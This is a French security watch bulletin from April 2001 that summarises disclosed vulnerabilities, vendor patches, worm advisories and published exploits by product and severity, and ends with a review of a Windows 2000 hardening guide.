L'existence d'une interface de ligne de commande sur 'ConsoleServer 3200') permet une attaque de type 'bruteforce'. 

Forte 11/04 Lightwave Communications ConsoleServer 3200 

Aucun correctif 'CLI' (Command Line Interface) Attaque de type 'brute-force' 

Bugtraq 


MICROSOFT 

Vulnérabilité 'CLSID' via 'Explorer' et 'IE' 

Il est possible de masquer l'extension réelle d'un fichier via 'Explorer' 'IE' si celle-ci correspond à un identifiant 

'CLSID'. 

Critique 16/04 Explorer et Internet Explorer sous Windows 98 et 2000 

Aucun correctif 'CLSID' (CLasS IDentifier) Non affichage des extensions de type 'CLSID' 

Guninski #42 http://www.guninski.com/clsidext.html 

Accessibilité du fichier 'user.dmp' 

Le fichier image généré en cas de dyfonctionnement d'une application est accessible à tous par défaut 

Forte 26/03 Windows NT et 2000 

Palliatif proposé Docteur Watson Fichier image accessible par tous en lecture 

Bugtraq 


Vulnérabilité dans 'IE5' avec 'IIS' ou 'Exchange' 

Il existe une vulnérabilité exploitable à distance dans Microsoft Internet Explorer 5.x en interaction avec 'IIS 5.0' et 

'Exchange 2000'. 

Forte 28/03 Internet Explorer 5.x en interaction avec IIS 5.0 et Exchange 2000 

Aucun correctif Fichier 'MSDAIPP.DSO' Accès non sécurisé aux objets permettant l'accès à un serveur IIS 5.0 

Guninski #40 http://www.guninski.com/iemsdaipp.html 

Vulnérabilité dans 'Internet Explorer' MSScriptControl 

Une vulnérabilité dans Internet Explorer, exploitable à distance, permet de lire sous certaines conditions les fichiers 

auxquels un tiers a accès. 

Forte 31/03 Microsoft Internet Explorer 5.5 (testé sous Windows 2000) 

Aucun correctif MSScriptControl.ScriptControl Accès non sécurisée aux fichiers 

Guninski #41 http://www.guninski.com/scractx.html 

NETOPIA 

Accès aux préférences systèmes par Timbuktu 

Il est possible d'accéder sans authentification aux préférences système d'un poste MacOS X sur lequel Timbuktu a 

été installé. 

Forte 20/04 Timbuktu sur MacOS X 

Correctif existant Timbuktu Preview Accessibilité aux préférences systèmes sans authentification 

SecureMac 

http://www.securemac.com/timubktuosxpreviewhole.cfm 

NETSCAPE 

Exposition d'information via Netscape 

Un utilisateur distant peut obtenir l'historique des pages visitées d'un tiers via Netscape. 

Forte 09/04 Netscape Navigator/Communicator 4.76 

Correctif existant Fichier 'gif' et protocole 'about' Passage de code javascript 

Bugtraq 


ORACLE 

Débordement de buffer dans 'Oracle Application Server' 

Il existe un débordement de buffer exploitable à distance dans la bibliothèque fournie avec OAS 4.0.8.2 (Oracle 

Application Server) et utilisée par 'iWS' (iPlanet Web Server). 

Forte 10/04 Oracle Application Server 4.0.8.2 avec Serveur web iPlanet Web Server 4.0/4.1 sous Sparc/Solaris 2.7 

Aucun correctif Bibliothèque 'ndwfn4.so' Débordement de buffer 

SAFER 0016 http://www.safermag.com/advisories/0016.html 



Avril 2001 

PGP 

Exposition de clé partagée dans PGP Desktop Security 

Une option de cache permet de retrouver une clé partagée complète à partir d'une 'portion' de clé. 

Critique 10/04 PGP Desktop Security 7.0 (testé sous Windows 2000) 

Aucun correctif Option de cache Conservation en cache de clé partagée 

[WSIR-01/02-03] http://www.wkit.com/content/eng/advisories/wsir0123.txt 

QUALCOMM 

Vulnérabilité dans le transfert de courrier sous Eudora 

Une vulnérabilité dans le transfert de courrier sous 'Eudora' permet à un utilisateur distant d'obtenir des 

informations contenues sur le disque de la victime. 

Forte 18/04 Qualcomm Eudora version 5.0.2 

Aucun correctif Attachements Prise en compte d'attachement lors de transferts 

Bugtraq 


RAYTHEON 

Déni de service dans 'Silent Runner Collector' (SRC) 

Une vulnérabilité dans 'Silent Runner Collector' peut conduire à un déni de service. 

Forte 30/03 Silent Runner Collector (testé sur la version 1.6.1) 

Aucun correctif Routines d'analyses trafic SMTP Débordement de buffer lors de l'analyse de chaînes HELO 

Bugtraq 


SUN 

Vulnérabilité dans 'perfmon' 

L'utilitaire 'perfmon' peut être utilisé pour créer un quelconque fichier. 

Critique 26/03 Solaris 2.X 

Palliatif proposé Utilitaire SUID 'perfmon' Absence de contrôle sur le chemin et nom d'accès aux journaux 

SecuriTeam http://www.securiteam.com/unixfocus/SunOS_application_perfmon_vulnerability.html 

Débordement de buffer dans 'tip' 

Un débordement de buffer, exploitable localement, est présent dans la commande 'tip' sous Solaris. 

Forte 28/03 Solaris 2.5, 2.5.1, 2.6, 7 et 8 

Aucun correctif Variables d'environnement Débordement de buffer 

Bugtraq 


Débordement de buffer dans 'ipcs' 

Un débordement de buffer affecte localement la commande 'ipcs'. 

Forte 11/04 SUN Solaris 7 (x86, probablement Sparc) 

Aucun correctif Variable d'environnement 'TZ' ( Débordement de buffer 

eEye 

http://www.eeye.com/html/Research/Advisories/AD20010411.html 

Débordement de buffer dans 'kcms_configure' 

Une vulnérabilité de type débordement de buffer affecte 'kcms_configure'. Un utilisateur local peut obtenir les 

privilèges 'root'. 

Forte 09/04 SUN Solaris 7 et 8 (Intel x86 et Sparc) 

Aucun correctif Analyse syntaxique des options Débordement de buffer 

eEye 


Débordement de buffer dans 'Xsun' 

Un débordement de buffer exploitable localement affecte la commande 'Xsun'. 

Forte 10/04 SUN Solaris 7 et 8 (Intel x86 et Sparc) 

Aucun correctif Variables d'environement) Débordement de buffer 

eEye 


SYMANTEC 

Déni de service dans 'Ghost' 

Une vulnérabilité de type déni de service affecte Symantec Ghost au travers du moteur Sybase. 

Forte 11/04 Symantec Ghost 6.5 pour Windows NT et 2000 

Aucun correctif Moteur Sybase Débordement de buffer 




Avril 2001 

TREND MICRO 

Vulnérabilité dans 'ScanMail' pour 'Exchange' 

Une vulnérabilité dans 'ScanMail' pour 'Exchange' permet de découvrir les noms et mots de passe de certains 

utilisateurs. 

Moyenne 30/03 ScanMail 3.5 (version d'évaluation) 

Palliatif proposé Base de registre Stockage des noms et mots de passe 

Bugtraq 


Deux vulnérabilités dans 'Interscan VirusWall' 

Deux vulnérabilités exploitables à distance affectent le service 'ISADMIN' d'Interscan VirusWall. 

Forte 12/04 Trend Micro Interscan VirusWall 3.01 (version courante: 3.6) 

Aucun correctif Service 'ISADMIN' 1 - Mauvaise configuration dans le fichier 'httpd.conf' 

2 - Débordement de buffer 

EEye 


AUTRES INFORMATIONS 

REPRISES D'AVIS ET CORRECTIFS 

Les vulnérabilités suivantes, déjà publiées, ont été mises à jour, reprises par un autre organisme, ou ont 

données lieu à la fourniture d'un correctif: 

AusCERT 

Reprise de l'avis Microsoft MS01-017 

L'AusCERT a repris, sous la référence AL-2001.04, l'avis Microsoft MS01-017 au sujet de faux certificats Microsoft 

émis par VeriSign. 

ftp://ftp.auscert.org.au/pub/auscert/advisory/AL-2001.04 

Reprise de l'avis SANS 'Lion Worm' 

L'AusCERT a repris, sous la référence AL-2001.05, l'avis du SANS au sujet du ver 'lion' exploitant la vulnérabilité 

'TSIG' de BIND 8. 


Reprise de l'avis CERT VU#648304 

L'AusCERT publie, sous la référence AL-2001.06, l'avis CERT VU#648304 portant sur un débordement de buffer 

dans le démon 'snmpXdmid' permettant le lien entre les protocoles DMI et SNMP Sun Solaris. 


CERT 

Vulnérabilité dans 'Internet Explorer' (MS01-020) 

Le CERT publie, sous la référence CA-2001-06, un avis relatif à la vulnérabilité affectant 'Internet Explorer' lors du 

traitement de documents de type MIME, décrite dans l'avis Microsoft MS01-020. Il est établit que c'est bien un objet 

utilisé par 'Internet Explorer' et non le navigateur qui est vulnérable. Ainsi toute application utilisant cet objet est 

potentiellement vulnérable. Cette alerte est aussi disponible via FedCIRC, sous la référence FA-2001-06. 

http://www.cert.org/advisories/CA-2001-06.htmlhttp://www2.fedcirc.gov/advisories/FA-2001-06.html 

CIAC 

Reprise de l'avis CERT CA-2001-07 

Le CIAC a repris, sous la référence L-070, l'avis CERT CA-2001-07 au sujet d'une vulnérabilité de type débordement 

de buffer lors de l'expansion de noms de fichiers. Les serveurs ftp affectés utilisent un dérivé de la fonction 'glob()', 

à l'origine de la vulnérabilité. 

http://ciac.llnl.gov/ciac/bulletins/l-070.shtml 

Reprise de l'avis CISCO 'CSCdt62732' 

Le CIAC a repris, sous la référence L-072, l'avis CISCO 'CSCdt62732'. Il est possible de provoquer à distance un 

déni de service en inondant de trames 802.1x le segment de réseau sur lequel se trouve le commutateur Cisco 

'Catalyst 5000'. 


Reprise de l'avis NIPC 01-005 

Le CIAC a repris, sous la référence L-064, l'avis NIPC 01-005 au sujet ver ver 'lion'. Il semble en effet beaucoup 

plus dangereux que prévu car il ouvre de multiples portes dérobée et installe l'outil de déni de service 'tfn2k' (tribe 

flood network). 




Avril 2001 

Reprise de l'avis CERT CA-2001-05 

Le CIAC a repris, sous la référence L-065, l'avis CERT CA-2001-05 au sujet d'une vulnérabilité exploitable à 

distance dans 'snmpXdmid'. Il est fortement recommandé de désactiver le démon vulnérable ainsi que les autres 

services RPC. 


Reprise de l'avis Microsoft MS01-020 

Le CIAC a repris, sous la référence L-066, l'avis Microsoft MS01-020 au sujet d'une vulnérabilité affectant 'Internet 

Explorer' lors du traitement de documents de type MIME. 


Reprise de l'avis SANS 'adore' 

Le CIAC a repris, sous la référence L-067, l'avis du SANS, émis par le GIAC au sujet du ver 'adore', issu des vers 

'ramen' et 'lion'. Ces virus s'attaquent aux récentes vulnérabilités 'wu-ftpd', 'rpc.statd', 'LPRng' et 'BIND'. 


Reprise de l'avis CISCO CSCds90807 

Le CIAC a repris, sous la référence L-068, l'avis CISCO CSCds90807 au sujet d'une vulnérabilité dans les 

concentrateurs Cisco VPN 3000. Il est possible de provoquer un déni de service à distance sur les concentrateurs en 

leur envoyant un important flot de données au port SSL ou telnet. 


Reprise de l'avis CISCO CSCdt32570 

Le CIAC a repris, sous la référence L-069, l'avis CISCO CSCdt32570 au sujet d'une vulnérabilité dans les 

commutateurs 'CSS' (Arrowpoint). Il est possible d'acquérir des droits plus élevés en soumettant une série de 

touches au clavier via une connexion telnet sur les commutateurs. 


COMPAQ 

Disponibilité d'un nouveau correctif pour 'CMA' 

Compaq [MUPssrt0715u_cpqim_01] annonce la disponibilité d'un nouveau correctif pour 'Compaq Management 

Agents' sous Tru64 UNIX V4.0f, 4.0g, 5.0, 5.0a et 5.1. La non-sécurisation du trafic permettait d'infiltration un 

réseau privé. 

http://ftp.support.compaq.com/patches/public/Readmes/unix/mupssrt0715u_cpqim_01.README 

FREEBSD 

Disponibilité de plusieurs correctifs 

FreeBSD annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages: 

UFS/Ext2FS FreeBSD-SA-01:30 

ntp FreeBSD-SA-01:31 

IpFilter FreeBSD-SA-01:32 

libc/ftpd FreeBSD-SA-01:33 

http://www.linuxsecurity.com/advisories/ 

HP 

Révision du bulletin sur 'asecure' 

HP révise le bulletin au sujet de 'asecure'. Certains terminaux X tels que 'Envizex II' risquent de ne plus fonctionner 

correctement avec les correctifs PHSS_22935 et PHSS_22936. Il est donc impératif d'utiliser pour HP-UX versions 

10.01, 10.10 et 10.20 : PHSS_21662 pour HP-UX version 11.00 : PHSS_21663 et de procéder aux changements 

suivants : '/usr/bin/chmod 444 /var/opt/audio/asecure_log' '/usr/bin/chmod 444 /var/opt/audio/audio_error_log' 

'asecure' [HPSBUX0103-145] 

http://europe-support2.external.hp.com/ 

IBM 

Disponibilité de correctifs temporaires pour 'xntpd' 

IBM annonce, sous la référence MSS-OAR-E01-2001:138.1, la disponibilité de correctifs temporaires pour le démon 

ntp. Ils sont destinés à minimiser l'impact que peut avoir la vulnérabilité affectant 'xntpd'. Il était possible de 

provoquer un déni de service voire d'obtenir un accès 'root' distant. 

http://www-1.ibm.com/services/continuity/recover1.nsf/advisories/8525680F006B944585256A2C00461A4F/$file/oar138.txt 

ftp://aix.software.ibm.com/aix/efixes/security/xntpd_efix.tar.Z 

LINUX 

Disponibilité des correctifs pour 'samba' 

Trustix [2001-0005] et Caldera [CSSA-2001-015.0] annoncent la disponibilité des correctifs pour 'samba'. Il était 

possible, pour un utilisateur local, de créer un lien symbolique afin de corrompre certains fichiers suite à une 

requête d'impression. 

http://www.linuxsecurity.com/advisories/other_advisory-1298.html 

http://www.linuxsecurity.com/advisories/caldera_advisory-1299.html 



Avril 2001 

LINUX DEBIAN 

Disponibilité de nombreux correctifs 

Debian annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages: 

ntp DSA-045-2 

exuberant-ctags DSA-046-2 

kernel DSA-047-1 

samba DSA-048-2 

cfingerd DSA-049-1 

sendfile DSA-050-1 

http://lists.debian.org/debian-security-announce-01 

LINUX MANDRAKE 


Mandrake annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages: 

vim MDKSA-2000:035 6.0 / 6.1 / 7.1 / 7.2 / CS1.0.1 

ntp MDKSA-2000:036 6.0 / 6.1 / 7.1 / 7.2 / CS1.0.1 

kernel MDKSA-2000:037 6.0 / 6.1 / 7.1 / 7.2 / CS1.0.1 

netscape MDKSA-2000:038 7.1 / 7.2 / CS1.0.1 

support 6.x MDKSA-2000:039 6.0 / 6.1 

samba MDKSA-2000:040 7.1 / 7.2 / CS1.0.1 / 8.0 

http://www.linux-mandrake.com/en/security/2001 

LINUX REDHAT 


RedHat annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages: 

sudo RHSA-2001:019-02 5.2 / 6.2 / 7.0 

vim RHSA-2001:008-02 5.2 / 6.2 / 7.0 

licq RHSA-2001:022-03 7.0 

openssh RHSA-2001:033-04 7.0 

kerberos 5 RHSA-2001:025-14 6.2 / 7.0 

openssh RHSA-2001:041-02 7.0 

pine RHSA-2001:042-02 5.2 / 6.2 / 7.0 

ntp RHSA-2001:045-05 5.2 / 6.2 / 7.0 

netscape RHSA-2001:046-03 6.2 / 7.0 

kernel RHSA-2001:047-03 6.2 / 7.0 

http://www.linuxsecurity.com/advisories/ 

MICROSOFT 

Disponibilité du correctif relatif à l'avis MS01-017 

Microsoft met à disposition le correctif relatif à l'avis MS01-017 concernant l'émission de faux certificats Microsoft 

par VeriSign. Ce correctif met à jour la liste des révocations afin d'interdire le téléchargements d'éxécutables signés 

par de faux certificats. 

http://www.microsoft.com/downloads/release.asp?ReleaseID=28888 

MySQL 

Disponibilité de 'MySQL' version 3.23.36 

MySQL annonce la disponibilité de 'MySQL' version 3.23.36. Cette nouvelle version corrige la vulnérabilité présente 

dans 'mysqld' permettant de créer une table dont le nom comporte la séquence '..'. 

http://lists.mysql.com/cgi-ez/ezmlm-cgi?2:mss:91:200103:lhhbldgdkhpiccnallka 

NetBSD 

Disponibilité des correctifs pour 'ftpd' 

NetBSD met à disposition les correctifs contre la vulnérabilité affectant le démon ftp 'ftpd'. Il était possible de 

provoquer à distance un débordement de buffer afin d'exécuter de code à distance et d'obtentir des privilèges 

'root'. NetBSD 'ftpd' [2001-005] 

http://www.linuxsecurity.com/advisories/netbsd_advisory-1275.html 

ftp://ftp.netbsd.org/pub/NetBSD/misc/security/advisories/NetBSD-SA2001-005.txt.asc 

NIPC 

Reprise de l'avis MS01-17 

Le NIPC publie, sous la référence 01-006, un bulletin venant compléter les bulletins émis par le CERT (CA-2001-04) 

et Microsoft (MS01-17) concernant l'usurpation d'identité ayant conduit à la délivrance de 2 certificats Verisign . 

http://www.nipc.gov/warnings/advisories/2001/01-006.htm 

Reprise de l'avis émis par le SANS portant sur 'LION' 

Le NIPC publie, sous la référence 01-005, un bulletin venant compléter l'alerte émise par le SANS Institute 

annonçant l'activité du vers 'LION'. Rappelons à ce sujet que 20% des serveurs DNS connectés sur l'Internet sont 

probablement vulnérables à l'attaque utilisée. 

http://www.nipc.gov/warnings/advisories/2001/01-005.htm 



Avril 2001 

OpenBSD 

Disponibilité des correctifs pour 'ftpd' 

OpenBSD annonce la disponibilité des correctifs contre la vulnérabilité affectant le démon ftp 'ftpd' permettant de 

provoquer à distance un débordement de buffer. 

http://www.openbsd.org/errata.html#globftp://ftp.openbsd.org/pub/OpenBSD/patches/2.8/common/025_glob.patch 

SCO 

Disponibilité des correctifs pour 'ntpd' 

SCO annonce la disponibilités des correctifs pour 'ntpd'. Une vulnérabilité de type débordement de buffer affectait le 

démon 'ntpd' des systèmes SCO OpenServer 5 et UnixWare 7.1 

ftp://ftp.sco.com/SSE/sse073.ltr (UnixWare 7.1.0 et 7.1.1) 

ftp://ftp.sco.com/SSE/sse074.ltr (OpenServer 5) 

SGI 

Disponibilité des correctifs 'BIND' pour IRIX 

SGI annonce la disponibilité des correctifs 'BIND' pour IRIX. Les versions affectées s'étendent de la 6.5 à la 6.5.11 

incluses. Plusieurs vulnérabilités critiques permettaient d'obtenir un accès 'root' distant. Il est impératif de mettre à 

jour tous les systèmes vulnérables. ftp://patches.sgi.com/support/free/security/advisories/20010401-01-P 


VIRUS 

'Winux' un virus multi-plateforme 

'Winux' est un virus créé par un Tchèque, qui, comme son nom l'indique s'attaque à la fois à Windows et à Linux. Il 

n'est pas destructif et se propage en vérifiant si les fichiers à infecter sont des exécutables Windows (format PE) ou 

Linux (format ELF) et utilise un code dédié en fonction de la plate-forme. Il s'agit là d'une idée très ingénieuse, 

malheureusement mise à mauvais profit qu'est le virus informatique. 

http://solutions.journaldunet.com/0103/010329vers.shtml 

http://www.wired.com/news/technology/0,1282,42672,00.html 

http://www.sophos.com/virusinfo/articles/lindose.html 

http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=PE_LINDOSE.A 

http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=ELF_LINDOSE.A 

http://www.sophos.com/virusinfo/analyses/w32lindose.html 

CODES D'EXPLOITATION 

Les codes d'exploitation des vulnérabilités suivantes ont fait l'objet d'une large diffusion: 

FTP 

Code d'exploitation contre la vulnérabilité 'glob()' 

Deux code d'exploitation contre la vulnérabilité 'glob()' des démons 'ftpd' ont été diffusés sur la liste Butraq. L'un, 

écrit en Perl est destiné aux plateformes FreeBSD. L'autre, écrit en langage C est destiné aux plateformes 

OpenBSD. 


MICROSOFT 

Code d'exploitation contre les serveurs 'ISA' 

SecureXpert Labs propose un code d'exploitation contre la vulnérabilité affectant les serveurs 'ISA'. Ce serveur 

était vulnérable à distance à une attaque de type déni de service. C'est à 'SecureXpert Labs' que Microsoft doit la 

découverte de cette vulnérabilité. 


Code d'exploitation contre la vulnérabilité MS01-020 

Un code d'exploitation contre la vulnérabilité décrite dans le bulletin Microsoft MS01-020 vient d'être publié. Une 

faille dans 'Internet Explorer' permettait d'exécuter du code à distance en soumettant un type MIME d'un courrier 

électronique ne correspondant pas au type de l'attachement fourni. 

http://www.finjan.com/attack_release_detail.cfm?attack_release_id=49 

http://www.finjan.com/mcrc/cuartango.cfm 

http://www.kriptopolis.com/cua/eml.html 

BULLETINS ET NOTES 

Les bulletins d’information suivants ont été publiés par les organismes officiels de surveillance et les 

éditeurs: 



Avril 2001 

AXENT/SYMANTEC 

Détection du virus 'lion' par les produits Symantec 

Symantec annonce que la suite de ses produits IDS et antivirus est en mesure de détecter la présence et l'activité 

du virus 'lion'. Par ailleurs, nous vous recommandons la lecture de l'avis du SANS continuellement mis à jour 

('http://www.sans.org/y2k/lion.htm'). 

http://www2.axent.com/swat/index.cfm?Doc=2001_03_26b 

Mise à jour pour 'ESM' (Enterprise Security Manager) 

Axent/Symantec a publié la 'Security Update 7' pour son produit ESM. Cette mise à jour intègre de nouvelles 

fonctionnalités pour Windows et pour de nombreux modules Unix (intégrité des comptes et du réseau, paramètres 

d'authentification...). 

http://www2.axent.com/swat/index.cfm?Doc=2001_04_05 

Mise à jour 'SU4' pour 'Net Prowler 3.5.1' 

Axent/Symantec a publié la 'Security Update 4' pour son produit NetProwler. Cette mise à jour intègre de nouvelles 

signatures permettant la détection de caractères d'échappement, de remontée de répertoire, d'exploitation de 

vulnérabilités CGI et de débordement de buffer des serveurs FTP. Il renforce aussi la signature 'Stacheldraht' déjà 

présente. En somme, 22 nouvelles signatures viennent s'ajouter grâce à la mise à jour 'NetProwler 3.5.1 SU4'. 

http://www2.axent.com/swat/index.cfm?Doc=2001_04_06 

Note au sujet des faux certificats Microsoft 

Symantec publie une note d'information au sujet des faux certificats Microsoft émis par VeriSign. Cette note fournit 

les recommandations d'usage afin de ne pas risquer de télécharger d'exécutables signés avec de faux certificats. 

http://www.symantec.com/avcenter/sirc/fraudulent.digital.certificate.html 

CERT 

Rapport annuel du CERT sur l'année 2000 

Le CERT publie un rapport sur les incidents majeurs de l'année 2000 en matière de sécurité informatique. Dénis de 

service, vulnérabilités 'BIND', 'FTP' et 'rpc.statd', contrôles 'ActiveX' et virus y sont sommairement décrits et mis en 

relation aux alertes associées. 

http://www.cert.org/annual_rpts/cert_rpt_00.html 

Vulnérabilité Sun 'snmpXdmid' largement exploitée 

Le CERT publie, sous la référence CA-2001-05, un bulletin d'alerte au sujet de la vulnérabilité 'snmpXdmid' sous 

Sun Solaris 2.6, 7 et 8. Il reporte en effet qu'un grand nombre de sites ont été attaqués et fournit ainsi les indices 

permettant de détecter si un système a été compromis. Le bulletin est aussi disponible via FedCIRC sous la 

référence FA-2001-05 

http://www.cert.org/advisories/CA-2001-05.html 

http://www2.fedcirc.gov/advisories/FA-2001-05.html 

Exploitation des vulnérabilités 'BIND' 

Le CERT publie, sous la référence IN-2001-03, une note recensant les différentes exploitations des vulnérabilités de 

'BIND'. Elle permet de reconnaître un système infecté par un toolkit ou un ver exploitant une des failles. 

http://www.cert.org/incident_notes/IN-2001-03.html 

CIAC 

Récapitulatif des systèmes dont 'ntpd' est vulnérable 

Le CIAC publie, sous la référence L-071, un récapitulatif des systèmes dont le démon 'ntpd' est vulnérable. Les 

risques encourus sont critiques et peuvent mener un utilisateur distant à un déni de service, l'exécution de code 

distant, voire l'obtention d'un accès 'root' distant si la faille n'est pas corrigée. 


IETF 

Faille de sécurité dans le protocole 'mobile IPv6' 

Le protocole 'Mobile IPv6' destiné à être utilisé dans les technologies 'sans-fils' apparait être moins sûr que prévu. 

Une vulnérabilité de conception dans l'un des mécanismes de sécurité pourrait amener le groupe de travail de l'IETF 

à revoir sa copie retardant ainsi sa mise en service. Aucune précision n'est disponible concernant cette vulnérabilité 

mais il semble qu'elle réside dans l'utilisation d'une adresse IPv6 en tant qu'élément fondamental de 

l'authentification du mobile, élement négocié lors du changement de zône du mobile par le biais de messages de 

mise à jour (Binding updates). La sécurité de ces messages est assurée par un mécanisme spécifique qui serait 

hélas susceptible d'une attaque de type 'Man-In-The-Middle'. 

http://www.idg.net/ic_497484_1794_9-10000.html 

ISC/BIND 

Disponibilité de BIND version 9.1.1 

L'ISC annonce la disponibilité de la version stable de BIND 9.1.1. Cette nouvelle version n'apporte aucune nouvelle 

fonctionnalité mais en revanche corrige de nombreuses vulnérabilités dont 'TSIG' qui a été exploitée par le ver 

'lion'. 

http://www.isc.org/products/BIND/bind9.html 



Avril 2001 

LINUX REDHAT 

Annonce de la nouvelle version de Red Hat 7.1 (seawolf) 

Red Hat annonce sa nouvelle version du système d'exploitation Linux. La version 7.1 (seawolf) inclut de 

nombreuses améliorations et renforce la sécurité du système. Plusieurs outils de configuration ont été ajoutés. 

http://www.redhat.com/products/software/linux/rhl_new_features.html 

McAFEE 

Faux certificats VeriSign détectés par antivirus 

McAFEE propose une signature pour son antivirus permettant de détecter les faux certificats VeriSign. Il est en 

effet très astucieux d'utiliser cette méthode, le certificat pouvant s'apparenter à un virus par sa signature. 

http://vil.nai.com/vil/virusSummary.asp?virus_k=99058 

MICROSOFT 

Outil de recherche par 'produit/service pack' 

Le site de Microsoft propose un nouvel outil en ligne permettant de connaître tous les bulletins liés à un produit et 

un service pack donnés. Il est ainsi possible recenser l'ensemble des correctifs appartenant à un service pack tout 

en ciblant le système utilisé. 

http://www.microsoft.com/technet/security/current.asp 

Décalage horaire dans certaines applications Microsoft 

Il semble qu'à partir du premier avril 2001, certaines applications soient susceptibles de renvoyer une heure 

incorrecte dans diverse routines C++, malgré un affichage correct de l'horloge. D'après Bugtraq, le problème en 

question durera jusqu'au 8 avril 2001. Il ne semble pas que cette annonce soit un poisson d'avril, un document 

officiel de Microsoft ayant été publié. 

http://msdn.microsoft.com/visualc/headlines/2001.asphttp://www.securityfocus.com/archive/1/172205 

SANS 

Nouvel outil de déni de service distribué 'CARKO' 

Le SANS vient d'être informé de l'existence d'un nouvel outil de déni de service distribué (DDoS) appelé 'CARKO'. Il 

s'agirait d'une variante de 'Stacheldraht'. Les systèmes d'exploitation de Sun seraient ciblés. Le contenu du lien 

fourni est susceptible d'évoluer. 

http://www.sans.org/current.htm 

Note d'information sur ADORE 

Le GIAC publie une note annoncant la disponibilité de l'outil 'adorefind' destiné à détecter la compromission d'un 

système LINUX par un vers dénommé 'adore' par le SANS. Notons que l'utilisation de ce nom porte à confusion, un 

'rootkit' du même nom étant diffusé sur l'Internet depuis plus de 6 mois par le groupe TESO. En pratique, la note 

du GIAC décrit ce qu'il convient d'appeler un 'autorooter', c'est à dire un script permettant l'automatisation de 

l'installation d'un 'rootkit'. Bien entendu, un tel script peut être très rapidement adapté pour installer un autre 

'rootkit' que celui initialement prévu. La découverte de ce nouvel avatar de 'ramen' confirme les risques de diffusion 

rapide de nouveaux 'rootkit' par le biais du la même technique d'installation. A ce jour, une quarantaine de 'rootkit' 

ont été inventoriés... Est-il nécessaire de rappeler l'urgence de l'installation des versions immunes de 'statd', 

'lprNG', 'bind', 'wu-ftpd' et de tout autre service vulnérable accessible depuis l'Internet. 

http://www.sans.org/y2k/adore.htm 

VERS LION 

Analyse détaillée du ver 'lion' 

Le site 'whitehats' propose une analyse extrêmement fournie du ver 'lion'. Cette analyse détaille comment et 

pourquoi 'lion' a été conçu puis aborde la partie technique en décomposant les cycles d'infection et de propagation 

des différentes versions du ver. Plusieurs liens et explications aident à la prévention à la fois sur un système et un 

réseau local. Les scripts originaux du virus sont aussi proposés. 

http://www.whitehats.com/library/worms/lion/index.html 

VIGILANTe 

Annonce de fusion entre VIGILANTe et Networks Vigilance 

Networks Vigilance, et VIGILANTe, deux sociétés spécialisée dans les outils et services dans le domaine des réseaux 

et de la sécurité annoncent leur fusion. Ce rapprochement renforce l'intérêt que les multinationales comme 

'VIGILANTe', Dano-Américaine, portent aux entreprises Françaises telles que 'Networks Vigilance'. 

http://www.vigilante.com/press/releases/nv_merger.htm 



Avril 2001 

ATTAQUES 

OUTILS 

HARDENING WINDOWS 2000 

Description 

Le document 'Hardening Windows 2000', proposé par Philip Cox, est extrait du livre 'Windows 2000 Security 

Handbook' édité chez Osborne/McGraw-Hill. La partie présentée a pour vocation de guider l’utilisateur vers une 

méthode de sécurisation des systèmes d’exploitation Windows 2000 Server, et par extension Windows 2000 

Professional. 

La stratégie retenue afin d’optimiser le processus de sécurisation est basée sur un principe simple et pour le moins 

efficace. S’il fallait résumer celui-ci, il affirmerait que «tout ce qui n'est pas utile au système est inutile au 

système». 

A première lecture, cette observation peut paraître naïve, cependant il est facile constater qu’un grand nombre 

d’attaques ont pour cible des services additionnels, souvent installés par défaut. En effet, on enregistre tous les jours 

l’apparition de nouvelles vulnérabilités. Celles-ci affectent des applications ou services pour la plupart inutilisés. Ceuxci 

constituent donc, potentiellement, un danger réel. Une politique paranoïaque se révèle souvent plus efficace que 

tout autre. 

Le document se place donc dans un contexte où les systèmes sont exposés à un environnement hostile, et se 

prémunir consiste ici à présenter le minimum de faiblesses afin d’être le moins vulnérable. Tout service, application, 

couche ou protocole est un talon d’Achille pour le système et les segments de réseau qui l’entourent. 

Le document se pose donc comme un guide de sécurisation dans le cadre de l’installation d’un système d’exploitation 

Windows 2000. La majorité des recommandations traite principalement de problèmes de configuration. Cependant 

l’étendue des domaines couverts est très vaste et celle-ci reflète parfaitement les dangers qu’un administrateur 

réseau pourrait rencontrer dans le contexte décrit. De plus, l’auteur rappelle que bon nombre de paramètres ne sont 

pas décrits, voire simplement documentés, ce qui rend la tâche encore plus difficile. 

Ainsi ce guide décrit en détails la marche à suivre afin d’obtenir le système le plus fiable possible. Les domaines 

suivants sont en grande partie développés : 

- Installation minimale du système 

- Renforcement du système par désactivation ou désinstallation des services inutilisés et des applications 

dépendantes 

- Reconfiguration de Syskey afin d’empêcher les attaques sur la base SAM (Security Account Manager) 

- Mise en place d’une politique de sécurité fiable sur les droits, comptes, mots de passe et options de sécurité des 

utilisateurs 

- Suppression 'physique' des services afin de consacrer une machine par service 

- Filtrage et renforcement des connexions TCP/IP et mise en place d’IPSec 

- Installation des correctifs (ou Service Packs) 

- Protection des binaires sensibles 

- Restriction des droits détenus par l’utilisateur anonyme 

Cette liste reflète la plupart des oublis ou écueils. En effet, l’administrateur réseau, ou tout autre utilisateur désireux 

d’installer un système fiable et sécurisé semble se focaliser sur la protection. Ainsi, l’utilisation d’EFS (Encrypting File 

Système) afin de chiffrer les données sensibles, l’installation de logiciel vérifiant l’intégrité du système tel que Tripwire 

ne seront jamais négligés au détriment des directives rappelées ci-dessus. 

Si l’on s’intéresse aux bulletins Microsoft ayant recensé une vulnérabilité dans le système d’exploitation 

Windows 2000 Server ou Professional, on obtient le tableau suivant: 

Bulletin Titre S P Origine de la vulnérabilité Evitable 

MS01-022 WebDAV Service Provider Can Allow Scripts to Levy X X Composant accédant aux Oui 

Requests as User 

ressources ‘WebDAV’ (msdaipp.dll) 

MS01-017 Erroneous VeriSign-Issued Digital Certificates Pose X X Falsification de certificats Non 

MS01-013 

Spoofing Hazard 

Windows 2000 Event Viewer Contains Unchecked Buffer X X Visualiseur d’évènements Non 

MS01-011 Malformed Request to Domain Controller Can Cause CPU X Service utilisé par le contrôleur de 

Exhaustion 

domaines 

MS01-007 Network DDE Agent Requests Can Enable Code to Run in 

System Context 

X X Network DDE Oui 

MS01-006 Invalid RDP Data Can Cause Terminal Server Failure X Protocole RDP Oui 

